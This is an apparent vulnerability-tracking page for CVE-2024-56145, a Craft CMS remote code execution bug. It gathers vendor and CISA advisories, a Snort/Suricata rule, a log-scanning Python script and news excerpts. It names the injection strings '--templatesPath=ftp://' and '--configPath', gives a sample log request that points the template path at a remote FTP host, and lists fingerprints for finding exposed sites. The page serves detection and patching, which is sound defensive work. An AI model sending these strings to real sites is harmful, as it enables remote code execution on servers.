CVE-2024-56145
Published 2024-12-18
Priority P1 · 98 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2025-06-23
Exploited in the wild
EPSS: 97.45% (99.9th percentile)
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 3.9.14, 4.13.2, or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| craftcms | cms | — | — |
| craftcms | cms | — | — |
| craftcms | cms | — | — |
| craftcms | cms | >= 3.0.0 < 3.9.14 | 3.9.14 |
| craftcms | cms | >= 4.0.0-RC1 < 4.13.2 | 4.13.2 |
| craftcms | cms | >= 5.0.0-RC1 < 5.5.2 | 5.5.2 |
| craftcms | craft_cms | >= 3.0.0 < 3.9.14 | 3.9.14 |
| craftcms | craft_cms | >= 4.0.0 < 4.13.2 | 4.13.2 |
| craftcms | craft_cms | >= 5.0.0 < 5.5.2 | 5.5.2 |
Detection & IOCs
url: `?--configPath=/nuclei_test/{{nonce}}`
command: `?--templatesPath=ftp://`
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|3f 2d 2d|templatesPath|3d|ftp|3a 2f 2f|"; fast_pattern; reference:cve,2024-56145; reference:url,www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms; classtype:attempted-admin; sid:2058436; rev:1; metadata:affected_product CraftCMS, attack_target Web_Server, tls_state TLSDecrypt, created_at 2024_12_20, cve CVE_2024_56145, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_12_20; target:dest_ip;)
- Look for HTTP GET requests containing `--templatesPath` or `--configPath` query parameters in the URI, which are the primary exploitation vectors for this vulnerability.
- Nuclei PoC probe returns HTTP 503 with body containing `mkdir()`, `Permission denied`, or `No such file or directory`; use these response strings to identify exploitation attempts.
- Shodan/FOFA fingerprinting: Craft CMS instances can be identified via `http.html:"craftcms"`, `http.favicon.hash:"-47932290"`, or `icon_hash=-47932290`; use these to scope exposure.
- The Metasploit module exploits the vulnerability by abusing the `--templatesPath` argument to load arbitrary templates via FTP, leading to RCE; monitor for outbound FTP connections from web server processes.
- EPSS score of 0.94049 (99.9th percentile) and confirmed KEV listing indicate active in-the-wild exploitation; prioritize detection and patching accordingly.
- Exploitation requires `register_argc_argv` to be enabled in php.ini. Instances with this setting disabled are NOT vulnerable; scope detection rules accordingly.
- The Snort/ET rule targets TLS-decrypted traffic (deployment tags: SSLDecrypt, TLSDecrypt); the rule will not fire on encrypted HTTPS traffic without TLS inspection in place.
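The first detection note above can also be applied to web server access logs, which see the request after TLS termination. The following is an added example, not taken from any of the sources on this page: the function names are hypothetical, the log lines are constructed, and it assumes combined-log-format entries. It also normalises URL-encoded dashes, which a literal match on `?--templatesPath=` would miss.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-log-format entry: "METHOD target HTTP/x" status
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Argument-style parameters named in the detection notes, at the start of the
# query string or after an '&' or '+' separator.
ARG = re.compile(r'(?:^|[&+])--(?P<name>templatesPath|configPath)=(?P<value>[^&\s]*)')
# A value that points at a remote scheme (ftp://, http://, ...) rather than a path.
REMOTE = re.compile(r'[a-z][a-z0-9+.\-]*://', re.I)

def decode_fully(s, rounds=3):
    """URL-decode repeatedly so %2d%2d and %252d%252d both normalise to '--'."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s

def classify(line):
    """Return None for lines without the pattern, else a dict describing the hit."""
    m = REQ.search(line)
    if not m:
        return None
    query = decode_fully(m["target"].partition("?")[2])
    hit = ARG.search(query)
    if not hit:
        return None
    remote = REMOTE.match(hit["value"]) is not None
    return {"method": m["method"], "param": hit["name"], "value": hit["value"],
            "status": int(m["status"]), "severity": "high" if remote else "medium"}

def scan(lines):
    """Return (line_number, hit) pairs for every matching log line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]

# Constructed sample entries (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Dec/2024:10:00:01 +0000] "GET /index.php?p=news&page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Dec/2024:10:00:07 +0000] "GET /?--configPath=/nuclei_test/abc123 HTTP/1.1" 503 812',
    '192.0.2.44 - - [20/Dec/2024:10:00:09 +0000] "GET /?%2d%2dtemplatesPath=ftp://198.51.100.7/t HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(n, hit)
```

A hit only shows that the request pattern was sent; whether the host was exposed still depends on `register_argc_argv` and the installed Craft CMS version.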
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 9.3 | CRITICAL | |
| cisa | | 9.3 | CRITICAL | |
OSV
Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
osv·2024-12-18
CVE-2024-56145 [CRITICAL] Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
### Impact
You are affected if your php.ini configuration has `register_argc_argv` enabled.
### Patches
Update to 3.9.14, 4.13.2, or 5.5.2.
### Workarounds
If you can't upgrade yet, and `register_argc_argv` is enabled, you can disable it to mitigate the issue.
GHSA
Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
ghsa·2024-12-18
CVE-2024-56145 [CRITICAL] CWE-78 Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
### Impact
You are affected if your php.ini configuration has `register_argc_argv` enabled.
### Patches
Update to 3.9.14, 4.13.2, or 5.5.2.
### Workarounds
If you can't upgrade yet, and `register_argc_argv` is enabled, you can disable it to mitigate the issue.
VulnCheck
Craft CMS Code Injection Vulnerability
vulncheck·2024·CVSS 9.3
CVE-2024-56145 [CRITICAL] CWE-94 Craft CMS Code Injection Vulnerability
Craft CMS contains a code injection vulnerability. Users with affected versions are vulnerable to remote code execution if their php.ini configuration has `register_argc_argv` enabled.
Affected: Craft CMS Craft CMS
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html; https://fortiguard.fortinet.com/outbreak-alert/earth-lamia-apt-attack; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cyble.com/blog/weekly-cyble-vulnerability-blog/; https://assets.recordedfuture.com/insikt-report-pdfs/202
CISA
Craft CMS Code Injection Vulnerability
cisa·2025-06-02·CVSS 9.3
CVE-2024-56145 [CRITICAL] CWE-94 Craft CMS Code Injection Vulnerability
Vulnerability: Craft CMS Code Injection Vulnerability
Affected: Craft CMS Craft CMS
Craft CMS contains a code injection vulnerability. Users with affected versions are vulnerable to remote code execution if their php.ini configuration has `register_argc_argv` enabled.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9 ; https://nvd.nist.gov/vuln/detail/CVE-2024-56145
Remediation Due Date: 2025-06-23
Suricata
ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)
suricata·2024-12-20·CVSS 9.3
CVE-2024-56145 [CRITICAL] ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|3f 2d 2d|templatesPath|3d|ftp|3a 2f 2f|"; fast_pattern; reference:cve,2024-56145; reference:url,www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms; classtype:attempted-admin; sid:2058436; rev:1; metadata:affected_product CraftCMS, attack_target Web_Server, tls_state TLSDecrypt, created_at 2024_12_20, cve CVE_2024_56145, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_1
Nuclei
Craft CMS - Remote Code Execution via Template Path Manipulation
nuclei·CVSS 9.3
CVE-2024-56145 [CRITICAL] Craft CMS - Remote Code Execution via Template Path Manipulation
This template identifies a critical Remote Code Execution (RCE) vulnerability in Craft CMS, identified as GHSA-2p6p-9rc9-62j9.
The vulnerability exists due to improper handling of the `--templatesPath` query parameter, allowing attackers to execute arbitrary code by referencing malicious Twig templates.
Template:
```yaml
id: CVE-2024-56145

info:
  name: Craft CMS - Remote Code Execution via Template Path Manipulation
  author: jackhax
  severity: critical
  description: |
    This template identifies a critical Remote Code Execution (RCE) vulnerability in Craft CMS, identified as GHSA-2p6p-9rc9-62j9.
    The vulnerability exists due to improper handling of the `--templatesPath` query parameter, allowing attackers to execute arbitrary code by ref
```
Metasploit
Craft CMS Twig Template Injection RCE via FTP Templates Path
metasploit
This module exploits a Twig template injection vulnerability in Craft CMS by abusing the --templatesPath argument. The vulnerability allows arbitrary template loading via FTP, leading to Remote Code Execution (RCE).
Bleepingcomputer
CISA warns of ConnectWise ScreenConnect bug exploited in attacks
blogs_bleepingcomputer·2025-06-03·CVSS 9.8
[CRITICAL] CISA warns of ConnectWise ScreenConnect bug exploited in attacks
## CISA warns of ConnectWise ScreenConnect bug exploited in attacks
## Ionut Ilascu
CISA is alerting federal agencies in the U.S. of hackers exploiting a recently patched ScreenConnect vulnerability that could lead to executing remote code on the server.
The agency is warning that four other security problems affecting ASUS routers and the Craft content management system (CMS) are also actively exploited.
## Improper authentication in ConnectWise ScreenConnect
On April 24, ConnectWise addressed the security issue, tracked as CVE-2025-3935, stating that the vulnerability could be exploited for a ViewState code injection attack.
The vendor notes that ASP.NET Web Forms rely on the ViewState component to preserve page and control state using base64-encoded data that is protected by machi
Trendmicro
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
blogs_trendmicro·2025-05-27
APT & Targeted Attacks
# Earth Lamia Develops Custom Arsenal to Target Multiple Industries
Trend™ Research has been tracking an active APT threat actor named Earth Lamia, targeting multiple industries in Brazil, India and Southeast Asia countries at least since 2023. The threat actor primarily exploits vulnerabilities in web applications to gain access to targeted organizations.
By: Joseph C Chen
2025/05/27
Summary
- Trend Research has identified Earth Lamia as an APT threat actor that exploits vulnerabilities in web applications to gain access to organizations, using various techniques for data exfiltration.
- Earth Lamia develops and customizes hacking tools to evade detection, such as PULSEPACK and BypassBoss.
- Earth Lamia has primarily targeted
Recorded Future
H1 2025 Malware and Vulnerability Trends
blogs_recorded_future
## H1 2025 Malware and Vulnerability Trends
## Executive Summary
The first half of 2025 (H1 2025) reflected a rapidly evolving threat landscape defined by the convergence of persistent legacy threats and advanced new tactics.
The total disclosed CVEs increased by 16% from H1 2024, and threat actors exploited 161 vulnerabilities with assigned CVEs, with nearly half linked to malware or ransomware campaigns. Microsoft remained the most targeted vendor, while edge security and gateway devices continued to be high-value targets for initial access. Malware activity was similarly dynamic: while law enforcement takedowns disrupted major players like LummaC2, a resurgence of legacy malware such as Sality indicated that old tools still offer utility for modern actors. Remote access trojans (RATs
- 2024-12-18: Published
- 2025-06-02: Added to CISA KEV
- Exploited in the wild